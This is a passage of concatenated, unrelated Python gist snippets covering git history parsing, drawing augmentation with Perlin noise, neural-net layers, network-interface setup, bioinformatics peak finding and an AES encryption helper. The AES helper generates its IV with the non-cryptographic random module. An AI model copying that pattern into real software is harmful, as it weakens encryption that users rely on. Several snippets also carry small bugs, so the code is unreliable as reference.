yyyyyyyyyyyyyyyyyynnqqppQQppppQQppqqZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZffffffffffffffllllllllllqqnnssxxxxnnnnnnnnyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyynnffQQppppQQppyyyyZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZffffffffffyyqqllllllllyyssxxxxnnnnnnnnnnyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyynnyyppQQppppQQqq??yyZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZffffllwwxxllllllllqqxxxxxxxxnnnnnnnnyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyynnllppppppQQZZcc??xxZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZqqccvvyyllllllllyyssxxxxnnnnnnnnnnyyyyyyyyyyyy
yyyyyyyyyyyyyynnnnZZQQppppQQqq????ccffddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZffnnxxssnnllllllllqqssxxxxxxnnnnnnnnnnyyyyyyyyyy
yyyyyyyyyyyyyynnqqppQQppQQppss??wwxxllQQddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZllxxxxxxxxqqllllllllnnssxxxxnnnnnnnnnnnnyyyyyyyy
yyyyyyyyyyyyyynnffQQppppQQZZvvssqqqqqqppddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZnnssssccccyyllllllllyyssxxxxnnnnnnnnnnnnyyyyyyyy
yyyyyyyyyyyynnyyppQQppppQQffssyynnxxccffddddddddddddddddddQQppppZZqqqqllffZZZZZZZZZZZZZZZZZZllssxxxxcc??nnllllllllqqxxxxxxxxnnnnnnnnnnnnyyyyyy
yyyyyyyyyyyynnllppppppppQQllvvcc??????qqddddddddddddddddppffffffllxxssxxxxqqZZZZZZZZZZZZZZZZnnvvssxxjj??nnllllllllllyyssxxxxnnnnnnnnnnnnnnyyyy
yyyyyyyyyyyynnZZQQppppppQQqq??????cc??xxQQddddddddddddppffffffffllxxssssssssqqZZZZZZZZZZZZffww??vvvvcc??xxllllllllllqqssxxxxxxnnnnnnnnnnnnyyyy
yyyyyyyyyynnqqppQQppppppQQqq??vvcc??wwyyZZddddddddddQQffffffZZZZZZyynnnnxxssxxffZZZZZZZZZZyy??vvvv??vv??xxllllllllllqqnnssxxxxnnnnnnnnnnnnnnyy
yyyyyyyyyynnffQQppppppppQQqq??vv??ccyyqqqqppddddddddppffffppddddQQZZffZZllxxssyyZZZZZZZZlljj??vvvvvvvv??nnllllllllllllyyssxxxxxxnnnnnnnnnnnnyy
yyyyyyyyyynnZZQQppppppppQQll????wwnnyywwjjffppQQQQppffffZZQQppppZZqqyyqqffyyssxxllffffqqxxcc??vvvvvvvv??nnllllllllllllqqxxxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyynnZZQQppppppppQQff????jjjj??vvxxllffffffffffffZZffllffllxxjjjjnnyyxxxxxxnnxxssjjvv??vv??vv????yyllllllllllllqqssxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyynnllppppppppppQQZZjj??vv??ccssssxxffffffffffffffffffffffnnxxxxssssxxxxxxssxxxxww??vvvv??vv??ccqqllllllllllllyyssxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyynnyyppQQppppppQQppnn??vvvvvvvv????qqffffffffffffffffffffnnssxxxxxxxxxxxxxxxxss????vvvv??vv??ssllllllllllllqqxxssxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyyyynnffQQppppppppQQll??vvvv????vv??jjllffffffffffffffffffnnssxxxxxxxxxxxxxxxxcc??vv??vvvvvv??nnllllllllllllyyssxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyynnqqppQQppppppQQZZww??vvvvvvvvvv??nnffffffffffffffffffnnssxxxxxxxxxxxxxxjj??vvvvvv??vv??ccqqllllllllllqqnnssxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyynnZZQQppppppQQppnn??vvvv????vv????yyffffffffffffffffnnssxxxxxxxxxxxxjj????vv??vv??vv??ssqqllllllllllqqssxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyynnqqppQQppppppQQll??vvvvvvvv??vv????qqffffffffffffffnnssxxxxxxxxxxssvv??vv??vvvvvvvv??nnllllllllllllnnssxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyyyynnZZQQppppppQQZZ????vvvvvvvv??vv??vvyyffffffffffffnnssxxxxxxxxssvv??vv??vvvv??vv????yyllllllllllqqssxxxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyyyynnqqppQQppppQQppss??vv??vvvvvv??vv????nnffffffffllnnssxxxxxxjj????vv??vvvvvv??vv??wwqqllllllllllnnssxxxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyyyyyynnffQQppppQQppnn??cc??vvvvvvvv??vv????ssqqffZZffnnxxxxssww????vv??vvvvvvvvvvvv??ssllllllllllyyssxxxxxxxxxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyynnyyppQQppppQQll??ccvvvvvvvvvvvv??vvvv????ssqqllxxjjww????vvvv??vvvvvvvv??vvvv??nnllllllllqqxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyynnllppQQppQQff????vvvvvvvvvvvvvv??vvvv??????wwcc??????vvvv??vvvvvvvvvv??vv????yyllllllllnnssxxxxxxxxxxxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyynnffQQppQQZZww??vv??vvvvvvvvvvvv????vvvv????????vvvvvvvvvvvvvvvvvvvv??vv??ccqqllllllyyssxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyynnnnZZQQQQppss??cc??vvvvvvvvvvvvvvvv????vvvvvvvvvv??vvvvvvvvvvvvvvvv??vv??wwqqllllqqxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppnn??cc??vvvvvvvvvvvvvvvvvvvv????vvvvvvvvvvvvvvvvvvvvvvvvvvvv??jjqqllqqxxssxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyynnqqppQQyy??cc??vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??ssllqqnnssxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyynnllppqq??cc??vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??vvvv??xxllnnssxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnllqq??vvvv??vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??vv????xxnnssxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnjj????vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv????wwssssxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnss????vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??vvjjxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyxxcc????vvvvvv??vvvvvvvvvvvvvvvvvvvvvvvvvvvv????wwssxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyxxjjcc????vvvvvvvv????vvvv????vvvvvvvv????ccjjxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnssjjcc??????vvvvvvvvvvvvvvvv??????ccjjssxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxssjjcc????????????????????ccjjssxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxssjjccvv????vvccjjssxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxssssssssxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnnnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
"""
```
#### File: hard-gists/4b79e30fad4ae8a50e2630fcfc4c8cfd/snippet.py
```python
import subprocess
import re
from dateutil import parser
class History(object):
def __init__(self, commits):
self._commits = ['%s' % n for n in commits if n.ot]
def __iter__(self):
return iter()
def __str__(self):
return '\n\n'.join(self._commits)
class Commit(object):
_ot = False
_quittingTime = 16
def __init__(self, raw):
self._pieces = [x.strip() for x in raw.split('\\n') if x != ''][:4]
if (len(self._pieces) >=4):
self._pieces = [re.sub(r'^([A-Z].*:\ )', '', x) for x in self._pieces]
dateObj = parser.parse(self._pieces[2])
self._pieces[2] = dateObj.strftime('%A %B %d %I:%M %p')
if (dateObj.hour >= self._quittingTime or dateObj.weekday() >= 5):
self._ot = True
def __str__(self):
return '\n'.join(self._pieces)
@property
def ot(self):
return self._ot
def runSubProc(args):
subp = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return str(subp.stdout.read())
def getHistory(user):
logs = runSubProc(["git", "log", '--author=%s' % user, "--no-merges"])
return History([Commit(x) for x in logs.split("commit")])
def main():
user = runSubProc(["git", "config", "user.email"]).strip("b'")[:-2]
logs = getHistory(user)
print(logs)
if __name__ == '__main__':
main()
```
#### File: hard-gists/4ba8ae5459ca4a287d42af549a611792/snippet.py
```python
import numpy as np
from noise import pnoise2, pnoise3
from scipy.ndimage.filters import gaussian_filter, gaussian_filter1d
def center_and_scale(drawing):
"""
Translate an entire drawing to the mean location of the points,
then scale the drawing to fit within +/-1.
"""
all_points = np.vstack(drawing)
meanxy = np.mean(all_points, axis=0)
minxy = np.min(all_points, axis=0) - meanxy
maxxy = np.max(all_points, axis=0) - meanxy
max_range = np.max(np.abs((minxy, maxxy)))
return [(stroke - meanxy) / max_range for stroke in drawing]
def get_noise_seed(seed=None):
if seed is None:
return np.random.rand(1) * 100000
else:
return seed
def noise_xy(points, scale=0.1, frequency=0.5, octaves=3, seed=None):
"""
Generate a number of x,y points using Perlin noise.
"""
seed = get_noise_seed(seed)
tn = np.linspace(seed, seed + frequency, points)
x = [pnoise2(0, float(t), octaves) * scale for t in tn]
y = [pnoise2(1, float(t), octaves) * scale for t in tn]
return x, y
def jitter_stroke(stroke, scale):
"""
Jitter the points in a stroke with Perlin noise.
"""
n = len(stroke)
x, y = noise_xy(n, scale=scale)
offsets = np.vstack([x, y])
return stroke + offsets.T
def jitter(drawing, scale=0.1):
"""
Jitter an entire drawing by jittering each stroke with Perlin noise.
"""
return [jitter_stroke(stroke, scale) for stroke in drawing]
def warp_stroke(stroke, scale=0.5, frequency=0.5, octaves=3, seed=None):
"""
Warp a stroke by applying a Perlin noise deformation field.
"""
seed = get_noise_seed(seed)
offsets = [[pnoise3(0 + seed, x, y, 3), pnoise3(1 + seed, x, y, 3)] for x, y in (stroke * frequency)]
return stroke + np.asarray(offsets) * scale
def warp(drawing, scale=0.5, frequency=0.5, octaves=3, seed=None):
"""
Warp a drawing by applying a Perlin noise deformation field.
"""
seed = get_noise_seed(seed)
return [warp_stroke(stroke, scale=scale, frequency=frequency, octaves=octaves, seed=seed) for stroke in drawing]
def smooth_position_stroke(stroke, sigma=1):
"""
Smooth a stroke with a Gaussian filter.
This smooths things in "sample space" rather than "real space".
"""
stroke[:,0] = gaussian_filter1d(stroke[:,0], sigma=sigma, mode='nearest')
stroke[:,1] = gaussian_filter1d(stroke[:,1], sigma=sigma, mode='nearest')
return stroke
def smooth_position(drawing, sigma=1):
"""
Smooth all the strokes in a drawing with a Gaussian filter.
This smooths things in "sample space" rather than "real space".
"""
sigma = np.abs(sigma * np.random.randn(1))
return [smooth_position_stroke(stroke, sigma=sigma) for stroke in drawing]
def smooth_velocity_stroke(stroke, sigma=1):
"""
Smooth a stroke by smoothing the derivative rather than the points directly.
"""
x = stroke[:,0]
y = stroke[:,1]
xd = gaussian_filter1d(np.diff(x), sigma=sigma, mode='nearest')
yd = gaussian_filter1d(np.diff(y), sigma=sigma, mode='nearest')
stroke[1:,0] = x[0] + np.cumsum(xd)
stroke[1:,1] = y[0] + np.cumsum(yd)
return stroke
def smooth_velocity(drawing, sigma=1):
"""
Smooth a drawing by smoothing the derivative rather than the points directly.
"""
sigma = np.abs(sigma * np.random.randn(1))
return [smooth_velocity_stroke(stroke, sigma=sigma) for stroke in drawing]
def jitter_scale(drawing, overall_sigma=0.1, aspect_sigma=0.05):
"""
Scale an entire drawing about 0,0 by a random gaussian.
"""
scale = (1 + np.random.randn(1) * overall_sigma) + np.random.randn(2) * aspect_sigma
return [stroke * scale for stroke in drawing]
def jitter_translate(drawing, sigma=0.10):
"""
Translate an entire drawing by a random gaussian.
"""
translate = np.random.randn(2) * sigma
return [stroke + translate for stroke in drawing]
def create_rotation_matrix(theta):
c, s = np.cos(theta), np.sin(theta)
return np.array([[c, -s], [s, c]])
def jitter_rotate(drawing, sigma=0.2):
"""
Rotate an entire drawing about 0,0 by a random gaussian.
"""
rotation = np.random.randn(1) * sigma
matrix = create_rotation_matrix(rotation)
return [np.dot(stroke, matrix).squeeze() for stroke in drawing]
def jitter_translate_stroke(drawing, sigma=0.02):
"""
Translate each stroke in a drawing by a random gaussian.
"""
return [stroke + np.random.randn(2) * sigma for stroke in drawing]
def jitter_scale_stroke(drawing, sigma=0.05):
"""
Scale each stroke in a drawing about the center of each stroke by a random gaussian.
"""
centers = [np.mean(stroke) for stroke in drawing]
return [((stroke - center) * (1 + np.random.randn(2) * sigma)) + center
for center, stroke in zip(centers, drawing)]
def jitter_rotate_stroke(drawing, sigma=0.2):
"""
Rotate each stroke in a drawing about the center of each stroke by a random gaussian.
"""
rotation = np.random.randn(1) * sigma
matrix = create_rotation_matrix(rotation)
centers = [np.mean(stroke) for stroke in drawing]
return [np.dot(stroke - center, matrix).squeeze() + center
for center, stroke in zip(centers, drawing)]
def shuffle_strokes(drawing, amount=0.25):
"""
Randomly swap the order of a percentage of the strokes in a drawing.
May swap less than the given percentage if it undoes a previous swap.
"""
n = len(drawing)
stroke_indices = np.arange(n)
shuffle_count = int(n * amount)
for i in range(shuffle_count):
i0 = np.random.randint(n)
i1 = np.random.randint(n)
temp = stroke_indices[i0]
stroke_indices[i0] = stroke_indices[i1]
stroke_indices[i1] = temp
return [drawing[i] for i in stroke_indices]
def reverse_strokes(drawing, amount=0.25):
"""
Randomly reverse the direction of a percentage of the strokes in a drawing.
"""
n = len(drawing)
indices = np.arange(n)
np.random.shuffle(indices)
flip_n = int(amount * n)
flip_indices = indices[:flip_n]
flips = [i in flip_indices for i in range(n)]
return [np.flipud(stroke) if flip else stroke for flip, stroke in zip(flips, drawing)]
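# Usage sketch: `drawing` is a list of (N_i, 2) numpy arrays, one per stroke,
# as all of the functions above expect; a few augmentations can be chained:
#   drawing = center_and_scale(drawing)
#   drawing = warp(jitter(drawing, scale=0.05), scale=0.3)
#   drawing = shuffle_strokes(jitter_rotate(drawing), amount=0.25)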
```
#### File: hard-gists/4c223b8e2d72b0e35bde/snippet.py
```python
from lasagne.layers import Layer
class HighwayLayer(Layer):
def __init__(self, incoming, layer_class, gate_nonlinearity=None,
**kwargs):
super(HighwayLayer, self).__init__(incoming)
self.H_layer = layer_class(incoming, **kwargs)
if gate_nonlinearity:
kwargs['nonlinearity'] = gate_nonlinearity
else:
kwargs['nonlinearity'] = lasagne.nonlinearities.sigmoid
kwargs['b'] = lasagne.init.Constant(-2)
self.T_layer = layer_class(incoming, **kwargs)
def get_params(self):
return self.H_layer.get_params() + self.T_layer.get_params()
def get_bias_params(self):
return self.H_layer.get_bias_params() + self.T_layer.get_bias_params()
def get_output_shape_for(self, input_shape):
return input_shape
def get_output_for(self, input, **kwargs):
T = self.T_layer.get_output_for(input, **kwargs)
return input * (1 - T) + T * self.H_layer.get_output_for(input, **kwargs)
def build_model(input_dim, output_dim,
batch_size=BATCH_SIZE, num_hidden_units=NUM_HIDDEN_UNITS):
""" Example usage (replaces build_model in mnist.py) """
l_in = lasagne.layers.InputLayer(
shape=(batch_size, input_dim),
)
l_in = lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.HeNormal(),
)
for i in range(49):
l_in = HighwayLayer(
l_in,
lasagne.layers.DenseLayer,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.HeNormal(),
)
l_out = lasagne.layers.DenseLayer(
l_in,
num_units=output_dim,
nonlinearity=lasagne.nonlinearities.softmax,
)
return l_out
```
#### File: hard-gists/4cfe3995013225d1d119/snippet.py
```python
import BroControl.plugin
class InterfaceSetupPlugin(BroControl.plugin.Plugin):
def __init__(self):
super(InterfaceSetupPlugin, self).__init__(apiversion=1)
def name(self):
return "InterfaceSetupPlugin"
def prefix(self):
return "interfacesetup"
def pluginVersion(self):
return 1
def init(self):
if self.getOption("enabled") == "0":
return False
return True
def options(self):
return [("mtu", "int", "9710", "Interface MTU"),
("enabled", "string", "0", "Set to enable plugin")]
def cmd_start_pre(self, nodes):
if not nodes:
return
mtu = self.getOption("mtu")
self.message("InterfaceSetupPlugin: mtu=%s" % (mtu))
host_nodes = {}
for n in nodes:
if n.interface:
host_nodes[(n.host, n.interface)] = n
cmds = []
for n in host_nodes.values():
cmd = "/sbin/ifconfig %s up mtu %s" % (n.interface, mtu)
cmds.append((n, cmd))
cmd = "/sbin/ethtool -K %s gro off lro off rx off tx off gso off" % (n.interface)
cmds.append((n, cmd))
self.executeParallel(cmds)
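# Configuration sketch (values illustrative): with the plugin installed, the
# options defined above are set in broctl.cfg under the plugin prefix:
#   interfacesetup.enabled = 1
#   interfacesetup.mtu = 9710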
```
#### File: hard-gists/4e97eb41e2b9a80cd5de/snippet.py
```python
# Note: this fragment is meant to run inside a unittest.TestCase test method
# (it uses self.assertEqual); `patch` comes from the mock library.
from mock import patch # on Python 3: from unittest.mock import patch
from myapp.mymodule import set_cache, get_cache
with patch('myapp.mymodule.cache') as mock_cache:
cache = {}
def get(key, default=None):
return cache.get(key, default)
def _set(key, value, timeout=60):
cache[key] = value
mock_cache.get = get
mock_cache.set = _set
set_cache()
self.assertEqual(cache['foo'], 'bar')
self.assertEqual(get_cache(), 'bar')
```
#### File: hard-gists/4ed43412878723491240814a0d5a6ed6/snippet.py
```python
import argparse
from khmer import khmer_args
import khmer
from khmer.kfile import check_input_files
from khmer.khmer_args import build_counting_args
from scipy.signal import find_peaks_cwt
import sys
import numpy as np
def peakdet(v, delta, x=None):
"""
Converted from MATLAB script at http://billauer.co.il/peakdet.html
Returns two arrays
function [maxtab, mintab]=peakdet(v, delta, x)
%PEAKDET Detect peaks in a vector
% [MAXTAB, MINTAB] = PEAKDET(V, DELTA) finds the local
% maxima and minima ("peaks") in the vector V.
% MAXTAB and MINTAB consists of two columns. Column 1
% contains indices in V, and column 2 the found values.
%
% With [MAXTAB, MINTAB] = PEAKDET(V, DELTA, X) the indices
% in MAXTAB and MINTAB are replaced with the corresponding
% X-values.
%
% A point is considered a maximum peak if it has the maximal
% value, and was preceded (to the left) by a value lower by
% DELTA.
% <NAME>, 3.4.05 (Explicitly not copyrighted).
% This function is released to the public domain; Any use is allowed.
"""
maxtab = []
mintab = []
if x is None:
x = np.arange(len(v))
v = np.asarray(v)
mn, mx = np.Inf, -np.Inf
mnpos, mxpos = np.NaN, np.NaN
lookformax = True
for i in np.arange(len(v)):
this = v[i]
if this > mx:
mx = this
mxpos = x[i]
if this < mn:
mn = this
mnpos = x[i]
if lookformax:
if this < mx - delta:
maxtab.append((mxpos, mx))
mn = this
mnpos = x[i]
lookformax = False
else:
if this > mn + delta:
mintab.append((mnpos, mn))
mx = this
mxpos = x[i]
lookformax = True
maxtab = [ int(i[0]) for i in maxtab]
return maxtab
def plot(x, plot_file, min_peaks=None, max_peaks=None):
"""Plot results of the detect_peaks function, see its help."""
try:
import matplotlib.pyplot as plt
except ImportError:
print('matplotlib is not available.')
else:
plt.style.use('ggplot')
_, ax = plt.subplots(1, 1, figsize=(8, 4))
ax.plot(x, 'black', lw=1)
if max_peaks:
ax.plot(max_peaks, x[max_peaks], '+', mfc=None, mec='g', mew=2, ms=8,
label='Max peaks')
if min_peaks:
ax.plot(min_peaks, x[min_peaks], '+', mfc=None, mec='r', mew=2, ms=8,
label='Min peaks')
ax.set_xlim(-.02 * x.size, x.size * 1.02 - 1)
ymin, ymax = x[np.isfinite(x)].min(), x[np.isfinite(x)].max()
yrange = ymax - ymin if ymax > ymin else 1
ax.set_ylim(ymin - 0.1 * yrange, ymax + 0.1 * yrange)
ax.set_xlabel('Abundance', fontsize=12)
ax.set_ylabel('Counts', fontsize=12)
plt.gcf().subplots_adjust(bottom=0.15)
ax.set_title("Min abundance finding.")
# plt.grid()
plt.savefig(plot_file)
def get_args():
parser = build_counting_args(
descr="Calculate the abundance distribution of k-mers from a "
"single sequence file.")
parser.add_argument('input_sequence_filename', help='The name of the input'
' FAST[AQ] sequence file.')
parser.add_argument('-z', '--no-zero', dest='output_zero', default=True,
action='store_false',
help='Do not output zero-count bins')
parser.add_argument('-b', '--no-bigcount', dest='bigcount', default=True,
action='store_false',
help='Do not count k-mers past 255')
parser.add_argument('-s', '--squash', dest='squash_output', default=False,
action='store_true',
help='Overwrite output file if it exists')
parser.add_argument('--savegraph', default='', metavar="filename",
help="Save the k-mer countgraph to the specified "
"filename.")
parser.add_argument('-f', '--force', default=False, action='store_true',
help='Overwrite output file if it exists')
parser.add_argument('-q', '--quiet', dest='quiet', default=False,
action='store_true')
parser.add_argument('--max-abundance', default=300, type=int, help="Max abundance to consider.")
parser.add_argument('--hist-plot', help="If set, the histogram of process will be saved there.")
return parser
def main():
args = get_args().parse_args()
check_input_files(args.input_sequence_filename, args.force)
print('making countgraph')
countgraph = khmer_args.create_countgraph(args, multiplier=1.1)
countgraph.set_use_bigcount(args.bigcount)
print('building k-mer tracking graph')
tracking = khmer_args.create_nodegraph(args, multiplier=1.1)
print('kmer_size: %s' % countgraph.ksize())
print('k-mer countgraph sizes: %s' % countgraph.hashsizes())
# start loading
rparser = khmer.ReadParser(args.input_sequence_filename)
print('consuming input, round 1 -- %s' % args.input_sequence_filename)
countgraph.consume_fasta_with_reads_parser(rparser)
print('Total number of unique k-mers: %s' %
countgraph.n_unique_kmers())
abundance_lists = []
def __do_abundance_dist__(read_parser):
abundances = countgraph.abundance_distribution_with_reads_parser(
read_parser, tracking)
abundance_lists.append(abundances)
print('preparing hist from %s...' %
args.input_sequence_filename)
rparser = khmer.ReadParser(args.input_sequence_filename)
print('consuming input, round 2 -- %s' % args.input_sequence_filename)
__do_abundance_dist__(rparser)
assert len(abundance_lists) == 1, len(abundance_lists)
abundance = {}
for abundance_list in abundance_lists:
for i, count in enumerate(abundance_list):
abundance[i] = abundance.get(i, 0) + count
total = sum(abundance.values())
if 0 == total:
print("ERROR: abundance distribution is uniformly zero; "
"nothing to report.")
print("\tPlease verify that the input files are valid.")
return 1
np_abundance = np.zeros(len(abundance))
max_count = 0
sofar = 0
for row_i, count in sorted(abundance.items()):
if row_i == 0 and not args.output_zero:
continue
np_abundance[row_i] = count
if count > max_count:
max_count = count
sofar += count
if sofar == total:
break
if args.max_abundance:
np_abundance = np_abundance[:args.max_abundance]
max_peaks = peakdet(np_abundance, 100)
min_peak = None
# Find lowest point in the interval
try:
for valley in xrange(max_peaks[0], max_peaks[1]):
if min_peak is None:
min_peak = valley
elif np_abundance[valley] < np_abundance[min_peak]:
min_peak = valley
print min_peak if min_peak is not None else -1
result = 0
except IndexError:
sys.stderr.write("Could not estimate min abundance for %s.\n" % args.input_sequence_filename)
if len(max_peaks) <= 1:
sys.stderr.write("Is there enough data in the FastQ? Only %s peaks have been identified." % len(max_peaks))
result = 1
if args.hist_plot:
plot(np_abundance, args.hist_plot, max_peaks=max_peaks[0:2], min_peaks=min_peak)
return result
if __name__ == '__main__':
exit(main())
```
#### File: hard-gists/5036719/snippet.py
```python
import sublime_plugin
class FileNameOnStatusBar(sublime_plugin.EventListener):
def on_activated(self, view):
path = view.file_name()
if path:
for folder in view.window().folders():
path = path.replace(folder + '/', '', 1)
view.set_status('file_name', path)
else:
view.set_status('file_name', 'untitled')
```
#### File: hard-gists/5051911/snippet.py
```python
import requests
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
def save_image_from_url(model, url):
r = requests.get(url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(r.content)
img_temp.flush()
model.image.save("image.jpg", File(img_temp), save=True)
```
#### File: hard-gists/5073235/snippet.py
```python
import sound
import time
def playNotes(inNotes, inWithEmphisis=False):
for note in inNotes:
sound.play_effect('Piano_' + note)
if (inWithEmphisis):
time.sleep(0.25)
sound.play_effect('Piano_' + note)
time.sleep(0.25)
else:
time.sleep(0.5)
cnotes = ['C3', 'E3', 'G3', 'A3', 'C4', 'A3', 'G3', 'E3']
fnotes = ['F3', 'A3', 'C4', 'D4', 'F4', 'D4', 'C4', 'A3']
gnotes = ['G3', 'B3', 'D4', 'E4', 'F3', 'A3', 'C4', 'D4']
xnotes = ['C3', 'E3', 'F3', 'F3#', 'G3', 'A3#', 'G3', 'G3']
for i in range(2):
playNotes(cnotes)
cnotes[4] = 'A3#'
playNotes(cnotes)
playNotes(fnotes)
cnotes[4] = 'C4'
playNotes(cnotes)
playNotes(gnotes)
playNotes(cnotes, True)
```
#### File: hard-gists/5099161/snippet.py
```python
from Crypto.Cipher import AES
import base64
import random
import hashlib
import os
class AesCrypt256:
"""
Aes Crypter based on pyCrypto
will replace Lib/Norris/AesCrypter.py
>>> c = AesCrypt256()
>>> key = 'mysecret'
>>> text = 'foobar'
>>> c.decrypt(key,c.encrypt(key,text))
'foobar'
>>> c.decryptB64(key,c.encryptB64(key,text))
'foobar'
>>> c.pkcs5_unpad(c.pkcs5_pad('foobar'))
'foobar'
>>> c.pkcs5_unpad(c.pkcs5_pad('foobar-'*10))
'foobar-foobar-foobar-foobar-foobar-foobar-foobar-foobar-foobar-foobar-'
"""
BLOCK_SIZE = 32
def pkcs5_pad(self,s):
"""
padding to blocksize according to PKCS #5
calculates the number of missing chars to BLOCK_SIZE and pads with
ord(number of missing chars)
@see: http://www.di-mgt.com.au/cryptopad.html
@param s: string to pad
@type s: string
@rtype: string
"""
return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE)
def pkcs5_unpad(self,s):
"""
unpadding according to PKCS #5
@param s: string to unpad
@type s: string
@rtype: string
"""
return s[0:-ord(s[-1])]
def encrypt(self, key, value):
"""Encrypt value by key
@param key: key to encrypt with
@type key: string
@param value: value to encrypt
@type value: string
@rtype: string
"""
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]
cipher = AES.new(key, AES.MODE_CBC, iv)
crypted = cipher.encrypt(self.pkcs5_pad(value))
return iv+crypted
def decrypt(self, key, value):
"""Decrypt value by key
@param key: key to decrypt with
@type key: string
@param value: value to decrypt
@type value: string
@rtype: string
"""
key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]
iv = value[:16]
crypted = value[16:]
cipher = AES.new(key,AES.MODE_CBC,iv)
return self.pkcs5_unpad(cipher.decrypt(crypted))
def encryptB64(self, key, value):
"""Encrypt and return in base64
        @param key: key to encrypt with
@type key: string
